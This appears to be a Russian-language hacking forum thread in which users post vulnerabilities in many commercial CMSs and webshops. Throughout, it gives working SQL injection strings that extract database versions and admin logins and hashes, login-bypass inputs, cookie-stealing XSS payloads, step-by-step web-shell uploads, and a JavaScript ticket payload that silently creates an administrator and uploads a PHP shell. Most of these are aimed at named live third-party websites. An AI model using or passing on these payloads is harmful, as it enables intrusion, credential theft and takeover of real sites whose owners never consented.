off site: http://www.intellisite.ch/index.php?nav= [XSS]
alert(01010)
+ в Поиске
[Feldmarschall]
23.10.2010, 03:46
Fastpublish CMS 2.0.x
SQL injection
/aufbau/comment.php
Пример:
http://www.fastpublish.de/aufbau/comment.php?artikel=106' limit 0 union select 1,0x6465,3,4,5,6,7,8,9,version(),11,12,13,14,15,16 ,17,18,19,0x434d53,21 --+1&popup=true
Путь+USER: http://www.fastpublish.de/aufbau/comment.php?artikel=106
wwwrun@localhost
/www/htdocs/w0081419/Original_Neu/aufbau/comment.php
[/COLOR]
[Feldmarschall]
25.10.2010, 02:51
Nexecuttive CMS
офф сайт: http://nexecutive.de/
SQL Injection:
http://nexecutive.de/glossar.php?i=glossary&g=showDef&categoryID=16+and+substring(version(),1,1)=3
(3.23.58-log) -версия.
Можно делать UPDATE:
http://nexecutive.de/update_nexecutive_db.php
Активная xss:
При регистрации, почти все поля.
http://nexecutive.de/index.php?i=register&languCode=de
Пассивная xss:
http://nexecutive.de/cms-shop.php?i=nexec_detail&ktID=33&categoryID=48">alert(document.cookie)
и во многих других местах
Путь:
http://nexecutive.de/spaw2/dialogs/dialog.php
http://nexecutive.de/logIn_openID.php
http://nexecutive.de/nexeclib/geomarkers.php
http://nexecutive.de/admin_modul/admin_admin.php
http://nexecutive.de/spaw2/spaw.inc.php
[Feldmarschall]
25.10.2010, 19:24
OMECO®webshop 4.0
BLIND SQL INJECTION
Пример:
http://shop.omeco.de/item/23/0/0/26/index.omeco?PHPSESSID=5aa879eab916e4eaee5d119db59b 8e88&ARTICLEID=26 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--&COMEFROM=&EVENT=item&ACT=insert&MENGE=1&insertbutton=Bestellen
Result:
Duplicate entry '4.1.221' for key 1
SQL INJECTION AUTHORIZATION BYPASS
http://shop.omeco.de/index.omeco?EVENT=showCustomer&scriptMode=order&PHPSESSID=5aa879eab916e4eaee5d119db59b8e88
Ihr Login: ' or 1=1# 1
Passwort: ' or 1=1# 1
Активная xss
При регистрации почти все поля уязвимы
вписуем
document.body.innerHTML ="body{ visibility:hidden; }
или что-то другое
OMECO®webcontent CMS
Пассивная xss:
http://www.omeco.de/
В Поиске: ">alert(xss)
[Feldmarschall]
27.10.2010, 01:36
SiteYouSelf CMS
Офф сайт: http://www.siteyourself.de/
xss inj.
http://www.siteyourself.de/start.php?sys_suche=aa">alert(document.cookie)&Button.x=19&Button.y=15&seitenid=43&seiteninhaltid=69&langid=1
Путь:
http://www.siteyourself.de/start.php?sys_suche=&Button.x=19&Button.y=15&seitenid=43&seiteninhaltid=-69
[Feldmarschall]
29.10.2010, 22:19
Web2Date v7.0
off site: http://www.databecker.de/ 178,50 EUR
XSS INJ.
https://www.databecker.de/shop/data-becker-newsletter-center/index.php
E-Mail* - Vorname - Nachname
https://www.databecker.de/pagedb.php?TemplateCategory=Kundenkonto-Gutschein
в Поле: ">alert(document.cookie)
https://www.databecker.de/pagedb.php?TemplateCategory=UsrTpl-newsdienste&mode=unsub">alert(document.cookie)
http://webservices.databecker.de/?Page=ProductChoiceIS
активка
Путь:
https://www.databecker.de/shop/s2duser.php?sid[]=
https://www.databecker.de/shop/s2dlogin.php?r[]=
https://www.databecker.de/shop/s2duser.php?m[]=edit&r= (нужно быть авторизованым)
https://www.databecker.de/pagedb.php?d_p=&S2DSESS=-2bf5a6f3d487d21db4330b13c7337bf9 (В Opera)
[Feldmarschall]
30.11.2010, 03:26
Xitex WebContent M1 CMS
Платна
офф сайт: http://webcontent-m1.com/
Passive XSS
http://webcontent-m1.com/m1/en/buyonline/standard_vs_professional
В поле:
Sign up for free e-newsletter XSS
Please correct you e-mail address
E-mail: alert('xss')
____
http://webcontent-m1.com/m1/en/buyonline/trial_version
http://webcontent-m1.com/m1/en/contact_us
http://webcontent-m1.com/m1/en/buyonline/overview
http://webcontent-m1.com/m1/en/send_feedback
Нужно минимум 2 поля заполнить хсс кодом.
">alert(document.cookie)
также фильтра нету никакого т.е можно все заполнить кавычками.
JobExpert
http://jobexpert.sd-group.org.ua/
XSS
Уязвим параметр currency
http://jobexpert.sd-group.org.ua/index.php?ut=competitor&do=search&q=xss&base=vacancy&type=any&id_section=1&id_profession=1t&id_region=1&id_city=1&pay_from=1¤cy=alert('d0s')&period=0&records=10
CMS.SSPRO
http://www.sspro.ru/
XSS
http://www.demo.sspro-soft.ru/?pgid=1&mod=1alert(123)
IBPRO CMS
http://cms.ibpro.com.ua/
XSS
http://cms.ibpro.com.ua/search/?qs=alert('d0s')
OSG WebShop
офф сайт: http://www.osg.ru/
Xss
http://www.demo.osg.ru/forum.html
Вбиваем ">alert('ded-m0r0z')
Уязвимые поля:
Ваше имя
Ваш e-mail
Ваш адрес в Internet
ну и гет запрос будет примерно таким:
http://www.demo.osg.ru/forum.html?idc=0&stype=0&pgn=1&idbook=97&idmain=0&idmess=0&rnd=14613&pgn=1&s_cf=28%2E50&s_ch=6A675D26682717306851D40C1878BD14&gbmess=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r0z%27 %29%3C%2Fscript%3E&idbook=97&gbwww=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r
NReco.Site CMS
офф сайт: nrecosite.com
XSS
Пишем в поиск:
alert('ololo')
Гет запрос такой будет:
http://www.nrecosite.com/search.aspx/ru?q=alert('ololo')
Заливка шелла в Shop-Script PREMIUM. Нужны права Админа.
Админка по умолчании расположена в site.com/admin.php
Заходим в Каталог->Категории и товары->Добавить новый товар. В появившемся окне заполняем форму, как угодно, и главный момент это, ставим галочку на чекбоксе Продукт является программой и заливаем пустой .htaccess дабы переписать существующий .htaccess в папке куда далее зальем наш web-shell.
Повторяем процедуру и уже заливаем шелл.
Шелл заливается в папку : site.com/products_files/ имя загружаемого файла не изменяется.
Zikula CMS Version 1pXSS:
zikula.de (http://zikula.de/)
/index.php
http://demo.zikula.de/index.php?module=benutzer&func=">alert('xss')
bcms, быстро cms
офф сайт: http://www.bistro-site.ru/
их хостинг: http://www.bistro-host.ru/
вообще это вебдизовая студия, но у них свой платный двиг.
На большинстве сайтов на странице с новостями.
MySQL inj
http://www.linefirm.ru/news/text?newsid=-6+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7+from+b_admin--
админка: /badmin
Имеется cpanel у сайтов на их хостинге.
Зайдя в диры, можно посмотреть содержимое папок у большинства сайтов(в приведённом мною так не попасть):
/bfiles, /bsystem
в /bfiles складируются любые файлы через админку, но на некоторых сайтах стоят права ток на чтение из этой папки.
на старых версиях двига юзается md5 для хэша, на новых - так и не подобрал(хорошо бы, если и мне скажете, если подберёте)).
1) Дата: 25.08.2011
2) Продукт: Официальный сайт (http://www.stewie.ru/) . Версия - не известна. StewieEngine Framework
3) Уязвимость: XSS
4) Автор: Фараон
5) Тип: удалённая
6) Опасность: 3
7) Описание: XSS и этим все сказано. Код отсутствует так как cms платная.
8) Эксплоит: http://www.sibcontact.ru/admin/login.php?back=">document.write('LOL');
9) Решение: htmlspecialchars($_GET[back]);
<Cyber-punk>
15.10.2011, 00:18
NetCat CMS
Уязвимость: Множественное раскрытие путей
Примеры:
/netcat/modules/calendar/showpreview.php?id=-1 (требует прав админа)
/netcat/full.php?classPreview=1
Уязвимость: Инлуд (раскрутить нельзя )
Примеры:
/netcat/modules/netshop/post.php?system=bank (bank - имя скрипта находящегося в каталоге /netcat/modules/netshop/payment)
З.Ы. Все вышеописанные уязвимости присутствуют на офф. сайте - netcat.ru
mr.Penguin
29.03.2012, 18:46
KASSELER CMS
Официальный сайт: kasseler-cms.net
Версия: 2.2 (последняя на данный момент)
Уязвимость: Активная XSS
Уязвимый параметр: user_gtalk
POST:
www.site.com/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш_Email@host.com&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=alert('XSS by Mr. Penguin')&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
PoC:
http://kasseler-cms.net/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш_Email@host.com&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=alert('XSS by Mr. Penguin')&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
ZRP CMS Sql-injection
Уязвимость платного ZRP CMS, в файле addbasket.php, в параметре dataID, что позволяет внедрять sql-команды.
Exploit:
addcard?dataID=117+and(select+1+from(select+count( *),concat((select+concat(login,0x3a,passwd,0x00)+f rom+zrp_user+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)--+f
Примеры:
http://www.photo[google]festival.info/addcard?dataID=117+and(select+1+from(select+count( *),concat((select+concat(login,0x3a,passwd,0x00)+f rom+zrp_user+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)--+f
http://www.elex[google]pro.ru/addcard?dataID=117+and(select+1+from(select+count( *),concat((select+concat(login,0x3a,passwd,0x00)+f rom+zrp_user+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)--+f
http://www.plw[google]ha.kz/addcard?dataID=117+and(select+1+from(select+count( *),concat((select+concat(login,0x3a,passwd,0x00)+f rom+zrp_user+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)--+f
Админка по адресу /zrp_admin/. Много раскрытии путей... В админке, мягко говоря, п****ц, везде скульи.
Оригинал поста в моем блоге (http://dbitems.ru) , здесь:
http://dbitems.ru/blog/?x=entry:entry120405-142125
Движок HLSTATX
exploit
Код:
host/ingame.php?mode=pro ./avatar.jpg
CMS казино
Стать кассиром передав в качестве Cookie username="любое кышы кышы"
Все данные хранятся в не зашифрованном виде.
XSS
kasa/stat.php?user=[xss]
rg=on
kasa/stat2.php?user=[xss]
Smart-CMS
Уязвимость: SQL-Injection
http://www.site.com/program/link.php?act=list&id=[SQLi]
Уязвимость: XSS-Active
http://www.site.com/program/register.php
Поля: "User name", "Reporter name".
http://1337day.com/exploits/19051
Множественные уязвимости в Budhae CMS
Нашёл - BigBear
URL разработчика - www.asuhanov.com/ourcms.php
demo - _ttp://demo.budhaecms.ru/budhae/index.php
Active XSS при добавлении/просмотре пользователя
Уязвимый код
/mods/component_user/add_user.php
if ($_POST['process']==1)
{
$ADDUSER['login']=$_POST['login'];
$ADDUSER['fullname']=$_POST['fullname'];
$ADDUSER['types']=$_POST['types'];
$ADDUSER['pass']=$_POST['pass'];
$ADDUSER['confirm']=$_POST['confirm'];
if ($_POST['pass']==$_POST['confirm']){
if ($SID->NewUser($ADDUSER)==1){echo ShowMessage('Пользователь добавлен',1);}else{echo ShowMessage('Такой пользователь уже существует',0);}
echo ShowMessage('Пароли не совпадают',0);
}else{
echo ShowMessage('Пароли не совпадают',0);
}
}
/mods/component_user/list_user.php
$USERS = $SID->GetListOfUser();
$PRNUSER='';
for ($i=0;$iПользователь: '.$USERS[$i]["budhae_login"].' ('.$USERS[$i]["budhae_fullname"].') - '.$USERS[$i]["budhae_type"].' - Редактировать Удалить
';
}
Вектор атаки - добавляем пользователя в админке http://site/admin/b_users.php
Login = alert(1234)
ФИО = alert(12345)
Active XSS при редактировании карты сайта
Уязвимый код
/classes/budhae_webpage.php
function AddNewPages($INFO){
include_once ("sql.php");
$execute2 = new DBConnect;
$execute2->Connect();
$SQL="INSERT INTO `webpages` (`name`,`url`,`type`) VALUES ('".$INFO["name"]."','".$INFO["url"]."','".$INFO["type"]."');";
$dump = $execute2->Query($SQL);
$execute2->Close();
...
function GetAllPages(){
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$SQL="SELECT * FROM `webpages`";
$dump = $execute->Query($SQL);
$Count=0;
while ($row=mysql_fetch_array($dump)){
$SID[$Count]['id']=$row['id'];
$SID[$Count]['name']=$row['name'];
$SID[$Count]['url']=$row['url'];
$SID[$Count]['type']=$row['type'];
$Count++;
};
$execute->Close();
return $SID;
}
Вектор атаки
Добавляем новую страницу http://site/admin/b_weburl.php?mode=add&step=1
Название = alert(100)
URL = alert(200)
Active XSSпри добавлении фото
Уязвимый код
/classes/budhae_gallery.php
function AddGallery($name,$gid,$tn)
{
include_once ("sql.php");
$execute2 = new DBConnect;
$execute2->Connect();
$TableName='bd_'.$gid.'_galleryname';
$SQL="INSERT INTO `".$TableName."` (`gnames`,`description1`) VALUES ('".$name."','".$tn."');";
$dump = $execute2->Query($SQL);
$execute2->Close();
}
...
function GetAllGallery()
{
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$SQL="SELECT * FROM `gallery_table`";
$dump = $execute->Query($SQL);
$Count=0;
while ($row=mysql_fetch_array($dump)){
$SID[$Count]['id']=$row['id'];
$SID[$Count]['name']=$row['name'];
$SID[$Count]['idgallery']=$row['idgallery'];
$Count++;
};
Вектор атаки
Добавляем новую галлерею http://site/admin/b_gallery.php?gid=&method=add
Название галереи = alert(100)
SQL-Injection при просмотре "Типа Новостей"
Уязвимый код
/classes/budhae_cats.php
function GetPageNameById($id,$gid){
$execute = new DBConnect;
$execute->Connect();
$TableName='bd_'.$gid.'_list';
$SQL="SELECT * FROM `".$TableName."` WHERE `id`=".$id." ORDER BY `show` ASC";
$dump = $execute->Query($SQL);
while ($row=mysql_fetch_array($dump)){
$datetotal = $row['name'];
};
$execute->Close();
return $datetotal;
}
Exploit
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+group+by+3
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+union+select+1,@@version,3
SQL-Injection при просмотре "Фотоальбома"
Уязвимый код
/classes/budhae_cats.php
function GetPageNameById($id,$gid){
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$TableName='bd_'.$gid.'_galleryname';
$SQL = "SELECT * FROM `".$TableName."` WHERE `id` =".$id;
$dump = $execute->Query($SQL);
while ($row=mysql_fetch_array($dump)){
$SName = $row['gnames'];
};
$execute->Close();
return $SName;
}
Exploit
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+group+by+7
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+union+select+1,@@version,3,4,5,6,7
ByPass Authentication
Уязвимый код
/classes/budhae_user.php
function UserLogin($USERID){
$USERID['login']=strtolower($USERID['login']);
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$SQL="SELECT * FROM users WHERE `login`='".$USERID['login']."' AND `password` ='".$USERID['password']."' LIMIT 1;";
$dump = $execute->Query($SQL);
$row=mysql_fetch_array($dump);
@session_start();
$_SESSION['budhae_login']=$row['login'];
$_SESSION['budhae_password']=$row['password'];
$_SESSION['budhae_type']=$row['type'];
$_SESSION['budhae_fullname']=$row['fullname'];
$_SESSION['budhae_date']=$row['date'];
$_SESSION['budhae_status']='approved';
$_SESSION['unique']=$row['unique'];;
return session_id();
$execute->Close();
}
Exploit
http://site/admin/index.php
login= 1' or 1='1
pass = 1' or 1='1
Раскрытие путей при любом обращении к файлам в /mods
_ttp://site/admin/mods/component_ftp/companent_main.php
_ttp://site/admin/mods/component_detect_cats.php
Fatal error: Class 'Files' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_ftp/companent_main.php on line 3
Fatal error: Class 'Components' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_detect_cats.php on line 7
Заливка шелла
_ttp://site/admin/filecomponent.php
Загружаемые расширения не фильтруются ---> shell.php
P.S. Очень дырявый и бажный движок. Перед покупкой 100 раз подумайте !!!
PoC: http://ioanidi.com/admins/
CMS alfasfera.com
Уязвимости к CMS этой веб-студии.
SQL Injection (POST method)
Идем на страницу восстановления пароля:
/page/new_pass/
Вставляем в поле E-Mail SQL запрос.
Панель админ-авторизации: /admin
Примеры уязвимых сайтов:
Уязвимые сайты найти можно у них в портфолио, вот два примера.
_ttp://imprus.su - Онлайн игра
_ttp://antipedofil.org - Оккупай-Педофиляй ит.д.
Хэширование пароля
Пароль хэшируется в MD5 с добавлением соли.
497911ed40a7e76681c5e93113f9e4a1:tt-
Этот хэш присутствует на всех сайтах, так что это тоже можно считать уязвимостью.
Найдено мною
Связка эксплойтовCritXpack
Активная XSS в поле BackURL
Для её работы нужно создать поток с .exe потом указать BackURL пример google.com/alert('a')
Внимание, после указание BackURL у вас исчезнет статистика, браузеров, загрузок, уников, лоадов и прочее. Зато после проверки админом придёт его сессия.
Узнать версию Amiro.CMS
Разработчик CMS: Amiro
Номер версии:
[/CODE]
Значение переменной '_cv' - версия CMS. Так для 5.14.6 _cv=5.14.6.6, а для 5.8.4 _cv=5.8.4.0. Кроме того, попробуйте воспользоваться поиском по коду, ибо данная переменная много, где фигурирует.
PS: Выложите на exploit-db по возможности, может пригодится в будущем.
SiteLeader CMS
Цена: Стоимость услуг по разработке сайтов: 75 000 — 250 000
Сайт: www.siteleader.ru
Тестировалось на версии 3.62
SQL Injection
/news/[VALIDNUMBER][SQLINJ]
Пример реализации
http://www.juliavolkova.com/ru/news/1'
http://www.juliavolkova.com/ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a
Ответ: VOLKOVA@LOCALHOST:VOLKOVA
http://krasimvse.ru/news/1'
http://krasimvse.ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a
Ответ: kraskoteka@localhost:kraskoteka
Админ-панель: /admin/login/
Стандартный логин: root
При добавлении контента (в админ-панели) везде выполняется JS код.
Найдено мной
CMS A4-site
Сайт:www.a4-site.ru
Демо-версия:www.demo.a4-site.ru
Функциональность: От сайтов-визиток с минимальной функциональностью до проектов с посещаемостью в десятки и сотни тысяч посетителей в день. (c)
Стоимость:Система управления сайтом A4-Site пока не продается "в коробке". Но вы можете заказать реализацию вашего проекта на ее основе в Интернет-компании A4-Site.(c)
Исследования проводим на демо-версии.
SQL Injection
Уязвимый параметр: search_str
Вектор: error-based
Требования: mq = off
Exploit:[http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search&search_str='and(extractvalue(1,concat(0x3a,version ())))and'&search_cond=AND]
Query:
INSERT INTO distr_searchlog(sl_query,sl_count,sl _time,sl_cond)VALUES(''and(extractvalue(1,concat(0 x3a,version())))and'',0,'0','AND')
XSS (passive)
Все тот же параметр search_str
Exploit: [http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search&search_str=">&search_cond=AND]
CMS Business Station
Сайт:http://cms-bs.ru
Стоимость:http://cms-bs.ru/configuration/
reflected XSS
Уязвимость присутствует в форме авторизации - переменная login.
PoC: отправляем пакет
POST /configuration/ HTTP/1.1
Host: cms-bs.ru
...
login=
">alert(1)
&password=111&submit=%C2%F5%EE%E4
CMS Shop-Rent
Сайт: shop-rent.ru
Time-Based Blind SQL Injection (pics.php):
pics.php?id=1'+and+(select * from+(select(sleep(10)))x)+and--'1
XSS
pics.php?id=">alert();
Примеры:
http://disloc.ru/pics.php?id=1' and (select * from (select(sleep(10)))x) and--'1
TRUE
http://bookcoffee.ru/pics.php?id=215' and (select * from (select(sleep(10)))x) and--'1
TRUE
Таблица с администраторами: gd_main_users
Таблица с остальными пользователями: gd_users
Админ-панель: admin.site.ru
http://www.vi-site.me/
site.ru/admin
LOGIN: admin' or 1='1
PASS: null
PAM HYIP
Сайт:http://www.pamhyip.com/
Версия:2014
Заливка шелла в админке (/admin/) Tools -> Banners. Таблица админов admin(колонки email, password). Алгоритм md5. Полностью дырявый скрипт, везде SQL-инъекции.
1. SQL-инъекция вgettogateway.php
...
$gatewayid=$_POST['gatewayid'];
$select=mysql_query("select * from `gateway_settings` where `statu s`='1' and gateway_id != '".$gatewayid."' ");
...
Пример:
http://hyip/gettogateway.php
POST: gatewayid=1' union select 1,concat_ws(0x3a,adminId,email,password),3,4,5,6,7 from admin-- t
2. XSS -> CSRF -> RCE
После регистрации (index.php?pg=register) и авторизации на сайте, можно отправлять тикеты (index.php?pg=ticket). Поле Message принимает все и без каких-либо изменений показывается в админ-панеле (admin/index.php?pg=tickets). Код выполнится, когда админ откроет наш тикет.
> Добавление нового админа
Создаем новый тикет, вписав в поле Message следующий код:
$(document).ready(function(){
$.ajax({
type:'POST',
url:'/admin/index.php?pg=subadminValid',
data: 'email=bbb%40aaa.aa&adminId=&password=123456&realname=aaaa&permission%5B%5D=Users&permission%5B%5D=Finance&permission%5B%5D=Reports&permission%5B%5D=Tools&permission%5B%5D=Support&permission%5B%5D=Settings&phoneno=12345652244&ipaddress=127.0.0.1&status=1&save=Submit',
});
});
Ключевыми являются параметры email, password и ipaddress. После открытия тикета создастся админ с юзернеймом bbb@aaa.aa (mailto:bbb@aaa.aa) и паролем 123456.
> Заливка шелла
Создаем новый тикет, вписав в поле Message следующий код:
$(document).ready(function(){
$.ajax({
type:'POST',
url:'/admin/index.php?pg=headerbannervalid',
contentType: 'multipart/form-data; boundary=1234567890',
data: "--1234567890\r\nContent-Disposition: form-data; name=\"banner\"; filename=\"php.php\"\r\n\r\n\r\n--1234567890--",
});
});
Уязвимый код в /admin/model/headimge.php:
...
$image=date('Ymdhis').$_FILES['banner']['name'];
move_uploaded_file($_FILES['banner']['tmp_name'],'../content/headercontent/'.$image);
...
Файл сохранится как [YYYY][mm][dd](H)(i)(S)php.php. Например 20171201010149php.php.Это уже надо брутить. Файл будет записан по адресуhttp://hyip/content/headercontent/.
P.S. Там уязвимостей очень много, думаю будет интересно покопаться, особенно начинающим
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot